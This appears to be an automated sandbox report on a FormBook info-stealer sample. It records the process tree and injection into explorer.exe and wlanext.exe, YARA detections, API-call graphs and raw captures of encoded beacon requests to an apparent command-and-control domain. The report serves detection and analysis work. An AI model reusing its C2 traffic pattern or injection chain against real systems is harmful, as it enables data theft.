33 5f 50 52 55 75 70 4b 6f 6c 50 68 50 45 50 58 56 70 6d 75 34 45 57 66 48 67 4f 36 71 4b 6e 73 68 6d 78 34 4a 33 7e 32 4c 46 68 78 43 71 79 48 6b 35 79 42 68 74 46 5f 77 56 35 7a 4e 65 6c 39 32 77 77 49 39 6f 45 51 74 56 35 2d 65 7a 55 59 4e 51 79 74 4f 44 73 57 73 50 6a 71 63 48 4c 72 7a 64 70 38 4a 6b 4b 41 6e 37 74 55 28 63 53 58 75 48 39 75 45 53 72 56 74 7a 6e 6f 6d 6c 47 47 41 66 35 4b 30 4d 7a 6b 6e 54 4f 53 72 56 71 71 75 6c 52 63 78 42 39 6f 4d 5a 4d 38 30 69 65 61 37 57 59 2d 57 4a 56 52 35 6f 34 4e 46 79 6a 4d 79 74 53 5f 42 58 36 70 7a 30 72 5f 4c 31 59 7a 45 73 73 44 30 6a 69 48 6c 52 71 53 73 54 59 55 77 4d 71 5a 63 76 4f 43 6d 54 76 44 6b 53 75 33 6c 62 4e 53 37 7a 32 49 76 39 64 64 52 6f 50 69 69 49 41 51 4c 72 41 73 38 58 72 68 69 33 36 48 46 39 33 39 42 41 45 55 46 74 41 78 35 47 51 53 65 5f 78 50 66 48 57 5a 6a 58 37 46 31 58 4e 65 72 7a 78 56 56 65 75 49 46 36 59 5f 7a 78 28 76 41 6d 43 43 69 4c 6b 53 50 44 61 56 75 7a 54 7a 78 47 41 49 6b 37 4a 67 54 69 6b 6b 7e 31 44 4b 72 72 43 38 45 61 4e 71 77 66 4d 49 64 75 58 54 65 50 37 71 57 7a 6c 77 5a 66 39 6c 72 48 5a 31 6d 39 51 68 50 51 61 61 42 33 71 61 37 38 70 4b 78 76 39 5a 68 62 5a 69 68 46 6d 66 74 7a 58 73 65 66 58 6c 79 4a 28 4e 6e 73 28 52 7a 65 47 78 48 61 36 43 7a 67 6c 78 66 54 34 65 59 2d 50 67 62 33 75 41 52 73 44 73 4d 49 68 45 56 57 4e 6f 65 56 49 52 6c 53 77 39 70 6a 53 50 54 5f 48 41 69 45 76 6e 34 5f 72 6c 75 6b 47 78 4f 35 55 4a 46 66 58 51 55 52 62 4b 49 4e 4c 35 61 4e 4d 36 6e 32 56 61 53 51 53 67 33 38 52 49 52 39 28 6f 65 53 71 6f 78 46 28 4d 71 74 47 34 38 2d 6a 77 41 4e 5a 72 73 56
                                        Data Ascii: 5eb6=jKc5GkmqQWJe2xOjRA3ALQn5UK6Dle3MtzPz2QyTxzQr27(p1SYB4rSaGNhej1J3pVTkVv7LyCqzg8RiUEMLBVSm(L(oTQ2QPmZd2RtH~4roXDLxAT5SdrrIF1kY98MNEcUJz9r4gkoTXMDGvnU71UhzJTFVSBPdwVlqznPu4RpuHn4BT4Uly5pKL30ByZ3FrwW-m2A9T0M-~5TSUSnKVLJ-bTKJjCNHLx~gjTakEYxAqsvgewogLkYvhEemBZ2HXcU5EEBCNib1Y7NmqEy8gzonX47crwxuE28dlKLDACMDtot6XBanjzfT2c5CJTiLpiWe986evtJyMJrXssYRpP4gRV5cQbQbGyT4NEvp8qBORJFXmDcydaDZnJAPpAOZn1cDDdwEvS4Oe3nABVtaInpVUf8b(OYzeRsZn36PTNclRT97m9Taoq5OpBwU4b8eQNv82vbt67z_~xy3RukXV9VNPekEIFfj~WBZhsHVP10Txv5DIRnzE7dtPgzBmJGmJ58zh7Uw6G1oQFDvsGKszN30ksIACZEjEUawr2aOBowmJBtb1bNOOaVqnFa3111YsGPZy-BvglmonOqOo2SOeHfMXLFS5habq09LJk6w5-ogNpS7C-qla1twBBxRLp5p2MukLo4s1wBN8P9SrhlDjyFfXH7YURO3FMMxmOg8xcxvg25V9PPq95SzUqUNW8QdV4MpU37LKIPkJN0YqGhIieVJJaPwZ7Eq6kACHP51(BrN8osGt4ERqSxFnmO8aEWqxkLrzzxVCVfFSzg8t22TwYvbyBDcElru3QBhsh1XMYnss8Buwpz_TQZK3_PRUupKolPhPEPXVpmu4EWfHgO6qKnshmx4J3~2LFhxCqyHk5yBhtF_wV5zNel92wwI9oEQtV5-ezUYNQytODsWsPjqcHLrzdp8JkKAn7tU(cSXuH9uESrVtznomlGGAf5K0MzknTOSrVqqulRcxB9oMZM80iea7WY-WJVR5o4NFyjMytS_BX6pz0r_L1YzEssD0jiHlRqSsTYUwMqZcvOCmTvDkSu3lbNS7z2Iv9ddRoPiiIAQLrAs8Xrhi36HF939BAEUFtAx5GQSe_xPfHWZjX7F1XNerzxVVeuIF6Y_zx(vAmCCiLkSPDaVuzTzxGAIk7JgTikk~1DKrrC8EaNqwfMIduXTeP7qWzlwZf9lrHZ1m9QhPQaaB3qa78pKxv9ZhbZihFmftzXsefXlyJ(Nns(RzeGxHa6CzglxfT4eY-Pgb3uARsDsMIhEVWNoeVIRlSw9pjSPT_HAiEvn4_rlukGxO5UJFfXQURbKINL5aNM6n2VaSQSg38RIR9(oeSqoxF(MqtG48-jwANZrsVPPcIklmN1PRZZVoLhUB1eAa-3kjx049P3S6Nuat0s0nM2Kz2HUhSEBHSoIs3j2Hoq2UpNQWVTlJhoaaH1G61JA8meUSCHiX0z32cfqSHpKVnBMgTVVqL5UGD9QPVqik5AUqxQqNn7LJVA6wabSG5w1mIU0~NVGn7~Y8TCS1CDnDT2U36H933K0BwnovlC12nvv7Q1g3ZKqwjs5f0yk3l9Osjem6sNrEsCXF-3V3FMmwwkzfnnm4yGfInTiEfYdZj7thCWBJj0QB6ljck~fZlqDY_UJTnaxkV(QdON8GLqR19Zf7ZFCp_SiMVRjFgDXAjJWAefK3uVeJyZIojuMyiMoERqK83wGYRhdcxgNPEJy6ezVk9rd(L8pbXrwCIk5Ni1xKjrGQTlfy2sE1UvZ0JkyNqcEXhuZ(rs32Fi0KKo6tmoaiunkgQUXWQ5fO2Y5n22wQFbj2PRMjZdaSj~FwwE5~eUvXJnBBye8VB6CvLHx7_JqygTwy37HQwkMj83KbPc_rN(G1fvp~vl2F8aftTBgLYtrK2(cv4cNt_vAw2iF4e4BzRkXKObUw0Qtlgie(T9Q~ZyReie_rOVxQupph4Y9Pxw2KnAqtxZClgQgYYx9IYZ4IiBW~gaOSJVG4dY9N6LS6tI50cWXyhlimpPLlhIwMZrlOCRY27D30Q~bOP3O9RBtUJFnQTr9breaJKxckB7PFna7uQoJe8bHXcXnJrqPNZgivVS-dkUWEuaQSOX5tjPtXskG1A~d9U4RVpZ5vk~rq3XK1BmCZI1yPTY3W9LCV-qipLUY8NzYxkW_fI9aHCdi24juhJi1u3z9VDsytTeVbl8QJkwjgj3a(a49O3cPsYWbYSBnPr~T0KhRmERTGzhnBx01g3t28SXbX-yrElSC5T1AHsNz4G1rjr0E9s7e(DpEnZwVYm9-O1Tu88kVbAdPw4OXR5cAH0VGaxDyIuU0I2NsfYvV(IJEYTFT7baaYxOM~KUuoJ~83693uPtD3jKZ2oHGrSpKZXpmmPvZOUC5G-LkRkmL6RgoJif-RvBGEdcP5R2t4REb9cCkBvpztjpUjEg4(arvmREMhXjG1ej1Zhe1w8oTAL23xJIBvO3B3lJodekEZ7d5sy6DW1tBcquUtMDYBxpydil3vHJatmmzWs2gRXUALMK5LnDhSrOkasAoI6tk0s409j8FRRx7FJavX4xVuihbsabxsT54AgCheAuZoFRJPOQVr5OydzXogQNQqCEbEZ1eO_6b1KtyZ-LRntJsFuhlfj6IiArSkRNdE6vqfmwnirEnuUsE7mYPsl2JBWyJBNh2~C34I6zRJTO5mu4qUqvOfQUx7brvvwyTnsJSxBmB~PFaKUlQJfpKQX5zxGS5KYCY9kB4AN6UbBxDEJpZDq5lO5yv2NxWEkvvn36fYEh_34WmNXap9jx3DHz_k0hXKA5SINm1F_udG1IVa1uqmCDkXIaTgLh4AKaTMHXFoLTGTfzT3EemVs225GC-(B(aqWj5ECu0o3NYvOla6oOPIaLS4cVOEFTclZz2LcRctrTsMUBzzJvBW9xVZyEp~I7eGRetwAr12pL0wj3DRbz5nU7B9SB_pWj_mJVst8WBKKrAllYsJdaq2PpO787SQo(UVszhsL9mi_CeQXhCEOleYCf-tAibrZFFhrMu9yo1Y2~NIDOrlNh7G1gf5ozH1IdPZKKW0DDd(mO2H0sZL5T3stgr5Pq3VMHfkJwKklaLI5OmwojDIFyTI6GacjFr3G21V9l7vmOfbWYtctq9H8GVUI8VjzT5p4iFIRUt5t4ncWoMZOQjzanb1s8zEqD7FbW6HP74(G3qJnlvM00YXgGZQa7LuoJSZGYd22Blz4QM5EYL1Vu7qb01Pz0sdmjAfHKA1iBStGcDMfhmG19ACWF4XhdXmZ1d94GTCjHrnrcO1v0iCTZ-zHKA0LtC8A~g(S1-cN24IBpZ(r2JHqkWdAJa4O~kAgFMg0~1JAoyieOHJuzC02FCr7icpKJ_3rgsEe2KZYgSHOUEL60OwN5HNLX53Pa3nlynjYu-zUCsTv0cDHLgBggPwshXWmixHuouFCYWCb963CIdYJIEjo1sqNGZLkpYHFP9DtXQF1fJZN(o373QvQSd14w2dcqQD5WlBChFm_f9IzUEZwIW7p60FVojnLGaNNp4IjUGSXLZbMvTqwAePSDSYlKOHXUCOO~6~39ngvxqo2TTbwTEtigu~PkDZO2uAD2IyMFvHq5ocN7bu0V5pQWFz93yZmujAzuGdpJXPvllA4urm6EGlOKwnSP9VDr7ZnQ0UavEGItGsx3pcxrbIR7w~J(UraouMbtHLsseK-0zsmo86_vZFnqq42YhapkMiDI5j79ZNXIBb1CWwxNjgMLoFVW8BIyK8YCA2GPGkof5iE5K4tTX8U2_fcOMj9dzzv6n3ghpIMr1zTpbroqvKCsWaGqQ713mOEV7FWKdvQ~rAnfV962XBpJMu2kIwoNV5T2O3YZXuJMr35dP9JcmTV1fduM4EbMjGx(le84QmakNOK8iC4pJiQxrrgfxJOPco5Wsui3PnT3FwavW9tS0XaBEzzxvUeXUnJAvAPGMvJLjlAfyGoIQBV1aquJxrqhX3zLWjVGhHt93Lttu0skT7Fnxadk_yilSOkdNYA0JtZe6qjGsZYIMwOwpwlMOAYnUpTACBkh68HLmbmckkvjkxPGU06wI22lVv_Ek6FptJFPl2
                                        May 30, 2023 19:34:19.584112883 CEST71INHTTP/1.1 404 Not Found
                                        Date: Tue, 30 May 2023 17:34:19 GMT
                                        Server: Apache/2.4.57 (Unix)
                                        Content-Length: 196
                                        Connection: close
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        4192.168.2.34970481.169.145.9380C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 30, 2023 19:34:22.623888016 CEST72OUTGET /bpg5/?5eb6=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwTE0i/pYvsbACINg==&ti-8=LyKdFPBKAe5W HTTP/1.1
                                        Host: www.musicandgros.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        May 30, 2023 19:34:22.645206928 CEST72INHTTP/1.1 404 Not Found
                                        Date: Tue, 30 May 2023 17:34:22 GMT
                                        Server: Apache/2.4.57 (Unix)
                                        Content-Length: 196
                                        Connection: close
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:19:33:24
                                        Start date:30/05/2023
                                        Path:C:\Users\user\Desktop\Product24573.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\Product24573.exe
                                        Imagebase:0xe60000
                                        File size:748544 bytes
                                        MD5 hash:0BA48F5E511AAC79F954AF60CEC8A491
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:low

                                        General

                                        Target ID:1
                                        Start time:19:33:32
                                        Start date:30/05/2023
                                        Path:C:\Users\user\Desktop\Product24573.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\Product24573.exe
                                        Imagebase:0x90000
                                        File size:748544 bytes
                                        MD5 hash:0BA48F5E511AAC79F954AF60CEC8A491
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Target ID:2
                                        Start time:19:33:32
                                        Start date:30/05/2023
                                        Path:C:\Users\user\Desktop\Product24573.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\Product24573.exe
                                        Imagebase:0x640000
                                        File size:748544 bytes
                                        MD5 hash:0BA48F5E511AAC79F954AF60CEC8A491
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.438783518.00000000010A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.438783518.00000000010A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.438783518.00000000010A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.438184381.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        Reputation:low

                                        General

                                        Target ID:3
                                        Start time:19:33:34
                                        Start date:30/05/2023
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0x7ff69fe90000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:6
                                        Start time:19:33:48
                                        Start date:30/05/2023
                                        Path:C:\Windows\SysWOW64\wlanext.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\wlanext.exe
                                        Imagebase:0xe10000
                                        File size:78848 bytes
                                        MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.649615353.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.649615353.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.649615353.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.650492164.00000000009E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.650492164.00000000009E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.650492164.00000000009E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.650551367.0000000000A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.650551367.0000000000A10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.650551367.0000000000A10000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        Reputation:high

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:9.9%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:102
                                          Total number of Limit Nodes:8
                                          execution_graph 27943 167c1a0 DuplicateHandle 27944 167c236 27943->27944 27945 167bb70 GetCurrentProcess 27946 167bbea GetCurrentThread 27945->27946 27948 167bbe3 27945->27948 27947 167bc27 GetCurrentProcess 27946->27947 27949 167bc20 27946->27949 27952 167bc5d 27947->27952 27948->27946 27949->27947 27950 167bc85 GetCurrentThreadId 27951 167bcb6 27950->27951 27952->27950 27953 16740d0 27954 16740ec 27953->27954 27955 16740fe 27954->27955 27959 1674259 27954->27959 27964 1673c60 27955->27964 27957 167411d 27960 167427d 27959->27960 27968 1674349 27960->27968 27972 1674358 27960->27972 27965 1673c6b 27964->27965 27980 16758d8 27965->27980 27967 1676b1e 27967->27957 27970 1674358 27968->27970 27969 167445c 27969->27969 27970->27969 27976 1673edc 27970->27976 27974 167437f 27972->27974 27973 167445c 27973->27973 27974->27973 27975 1673edc CreateActCtxA 27974->27975 27975->27973 27977 16753e8 CreateActCtxA 27976->27977 27979 16754ab 27977->27979 27981 16758e3 27980->27981 27984 1676c28 27981->27984 27983 16770bd 27983->27967 27985 1676c33 27984->27985 27988 1676c58 27985->27988 27987 167719a 27987->27983 27989 1676c63 27988->27989 27992 1676c88 27989->27992 27991 167728a 27991->27987 27993 1676c93 27992->27993 27995 167799e 27993->27995 27999 1679780 27993->27999 28004 1679790 27993->28004 27994 16779dc 27994->27991 27995->27994 28007 167b898 27995->28007 28000 1679751 27999->28000 28001 167978e 27999->28001 28000->27995 28013 1679888 28001->28013 28002 167979f 28002->27995 28005 167979f 28004->28005 28006 1679888 3 API calls 28004->28006 28005->27995 28006->28005 28008 167b89d 28007->28008 28009 167b8ed 28008->28009 28037 167ba15 28008->28037 28041 167ba58 28008->28041 28045 167bab1 28008->28045 28009->27994 28014 167989b 28013->28014 28015 16798b3 28014->28015 28021 1679b01 28014->28021 28029 1679b10 28014->28029 28015->28002 28016 16798ab 28016->28015 28017 1679ab0 GetModuleHandleW 28016->28017 28018 1679add 28017->28018 28018->28002 28022 1679b08 28021->28022 28023 1679aa4 GetModuleHandleW 28022->28023 28026 1679b0a 28022->28026 28025 1679add 28023->28025 28025->28016 28027 1679b49 28026->28027 28033 1678c08 28026->28033 28027->28016 28030 1679b24 28029->28030 28031 1678c08 LoadLibraryExW 28030->28031 28032 1679b49 28030->28032 28031->28032 28032->28016 28034 1679cf0 LoadLibraryExW 28033->28034 28036 1679d69 28034->28036 28036->28027 28038 167ba58 28037->28038 28039 167ba9f 28038->28039 28049 167a58c 28038->28049 28039->28009 28042 167ba5c 28041->28042 28043 167a58c 3 API calls 28042->28043 28044 167ba9f 28042->28044 28043->28044 28044->28009 28046 167ba5c 28045->28046 28047 167a58c 3 API calls 28046->28047 28048 167ba9f 28046->28048 28047->28048 28048->28009 28050 167a591 28049->28050 28052 167c798 28050->28052 28053 167bda4 28050->28053 28054 167bdaf 28053->28054 28055 1676c88 3 API calls 28054->28055 28056 167c807 28054->28056 28055->28056 28060 167e590 28056->28060 28066 167e58a 28056->28066 28057 167c840 28057->28052 28062 167e60d 28060->28062 28063 167e5c1 28060->28063 28061 167e5cd 28061->28057 28062->28057 28063->28061 28064 167ea00 LoadLibraryExW GetModuleHandleW GetModuleHandleW 28063->28064 28065 167ea10 LoadLibraryExW GetModuleHandleW GetModuleHandleW 28063->28065 28064->28062 28065->28062 28068 167e60d 28066->28068 28069 167e5c1 28066->28069 28067 167e5cd 28067->28057 28068->28057 28069->28067 28070 167ea00 LoadLibraryExW GetModuleHandleW GetModuleHandleW 28069->28070 28071 167ea10 LoadLibraryExW GetModuleHandleW GetModuleHandleW 28069->28071 28070->28068 28071->28068

                                          Executed Functions

                                          Function 0339E5A0 Relevance: .7, Instructions: 651COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.400900360.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3390000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5887a024660c391831e57a41b23bceef63d3e6b97abf19f5bfd1f3fd6c2dd0ee
                                          • Instruction ID: e41d39e549c2a57384dc543068a162c375dee6bc110ed5ec27801a5cdf19d282
                                          • Opcode Fuzzy Hash: 5887a024660c391831e57a41b23bceef63d3e6b97abf19f5bfd1f3fd6c2dd0ee
                                          • Instruction Fuzzy Hash: ED42F334714200CFDF18DBB8D59966A7BF6FF89606F2544AEE50ACB361DE329841CB41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0167BB61 Relevance: 6.1, APIs: 4, Instructions: 125threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 0167BBD0
                                          • GetCurrentThread.KERNEL32 ref: 0167BC0D
                                          • GetCurrentProcess.KERNEL32 ref: 0167BC4A
                                          • GetCurrentThreadId.KERNEL32 ref: 0167BCA3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.399193748.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1670000_Product24573.jbxd
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: 9470c5c8a85fd67532125494eb82551a7c63fca776951443825108a1cfa3a859
                                          • Instruction ID: 4b286c81aaedbeb660d5aebcf5958545e373441ec62b9884159efeb69a8a763c
                                          • Opcode Fuzzy Hash: 9470c5c8a85fd67532125494eb82551a7c63fca776951443825108a1cfa3a859
                                          • Instruction Fuzzy Hash: 2E5144B49002498FDB14CFAADA88BEEBBF5AF48314F248459E009A7351DB755884CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0167BB70 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 0167BBD0
                                          • GetCurrentThread.KERNEL32 ref: 0167BC0D
                                          • GetCurrentProcess.KERNEL32 ref: 0167BC4A
                                          • GetCurrentThreadId.KERNEL32 ref: 0167BCA3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.399193748.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1670000_Product24573.jbxd
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: 0411f3e40aebf94fc0eb2592bfcc5e6cd7ed10b3851af057afaaf107c55bd721
                                          • Instruction ID: f7bf583a56e2f4e92b0d34065afe074ca88b1d5d1942a5d677162e36d5caf342
                                          • Opcode Fuzzy Hash: 0411f3e40aebf94fc0eb2592bfcc5e6cd7ed10b3851af057afaaf107c55bd721
                                          • Instruction Fuzzy Hash: 225136B49002498FDB14DFAADA88BDEBBF5BF48314F208459E409B7350DB756884CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01679888 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 01679ACE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.399193748.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1670000_Product24573.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: dfe7f7b0f6684d52bc95334baf75e10976f56a649a4fcbdc7837144930afe1e3
                                          • Instruction ID: f61caffc574f14defc15d13464fbcc9c353ca4f8a9726f1790c445cc7b59c3db
                                          • Opcode Fuzzy Hash: dfe7f7b0f6684d52bc95334baf75e10976f56a649a4fcbdc7837144930afe1e3
                                          • Instruction Fuzzy Hash: 4E712570A00B058FEB24DF2AD85475ABBF5BB88314F048A2ED48AD7B50D735E805CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01679B01 Relevance: 1.7, APIs: 1, Instructions: 158COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 100 1679b01-1679b08 102 1679aa4-1679aa8 100->102 103 1679b0a-1679b0c 100->103 104 1679ab0-1679adb GetModuleHandleW 102->104 105 1679aaa-1679aad 102->105 106 1679b70-1679bc7 103->106 107 1679b0e-1679b26 call 16776f4 103->107 108 1679ae4-1679af8 104->108 109 1679add-1679ae3 104->109 105->104 111 1679c1b-1679c6b 106->111 112 1679bc9-1679bee 106->112 118 1679b56-1679b5b 107->118 119 1679b28-1679b39 call 1678bfc 107->119 109->108 125 1679c74-1679ca5 111->125 126 1679c6d-1679c73 111->126 112->111 120 1679bf0-1679bf2 112->120 118->106 131 1679b4d-1679b54 call 1678c14 119->131 132 1679b3b-1679b44 call 1678c08 119->132 123 1679c15-1679c18 120->123 124 1679bf4-1679bfe 120->124 123->111 128 1679c02-1679c11 124->128 129 1679c00 124->129 136 1679ca7-1679cab 125->136 137 1679cb5 125->137 126->125 128->128 133 1679c13 128->133 129->128 131->118 141 1679b49-1679b4b 132->141 133->123 136->137 140 1679cad 136->140 142 1679cb6 137->142 140->137 141->118 142->142
                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 01679ACE
                                            • Part of subcall function 01678C08: LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01679B49,00000800,00000000,00000000), ref: 01679D5A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.399193748.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1670000_Product24573.jbxd
                                          Similarity
                                          • API ID: HandleLibraryLoadModule
                                          • String ID:
                                          • API String ID: 4133054770-0
                                          • Opcode ID: a2784cefe31e311df0cbbde9cab11866bd883877228c19c22014c72b772ecd27
                                          • Instruction ID: 81a661e28c81904607501586c85f062776ebd66a2640c8017a492f8e0332d1a9
                                          • Opcode Fuzzy Hash: a2784cefe31e311df0cbbde9cab11866bd883877228c19c22014c72b772ecd27
                                          • Instruction Fuzzy Hash: 1C517BB1E002198FDB14CFA9CC44BAEBBF5EB88728F148129D919E7344DB749845CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

